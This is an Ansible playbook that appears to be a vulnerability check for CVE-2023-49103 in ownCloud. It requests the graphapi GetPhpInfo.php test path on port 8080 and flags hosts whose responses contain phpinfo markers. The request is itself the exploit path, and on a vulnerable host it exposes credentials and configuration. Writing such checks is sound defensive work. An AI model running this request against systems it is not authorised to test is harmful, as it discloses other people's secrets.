- name: CVE-2023-49103 ownCloud Disclosure of Sensitive Credentials and Configuration in Containerized Deployments Playbook
  gather_facts: false
  hosts: all
  vars:
    uris:
      - "apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
      - "owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
    uri: "owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
    pattern1: 'PHP Version'
    pattern2: 'PHP Extension'
    pattern3: 'owncloud'
    ports:
      - 8080
  tasks:
    - name: Assess vulnerable condition
      ansible.builtin.uri:
        url: "http{{ (item.0 | int == 443) | ternary('s', '') }}://{{ inventory_hostname }}:{{ item.0 }}/{{ item.1 }}"
        method: GET
        timeout: 2
        status_code: 200
        return_content: true
        force: true
        validate_certs: false
      loop: "{{ ports | product(uris) }}"
      register: response
      ignore_errors: true
      delegate_to: 127.0.0.1

    - name: Examine vulnerable condition response
      ansible.builtin.debug:
        msg: "Device {{ inventory_hostname }} is potentially vulnerable with response content: {{ item.content }}"
      loop: "{{ response.results }}"
      when:
        - response is defined
        - item.status == 200
        - item.content | regex_search(pattern1)
        - item.content | regex_search(pattern2)
        - item.content | regex_search(pattern3)
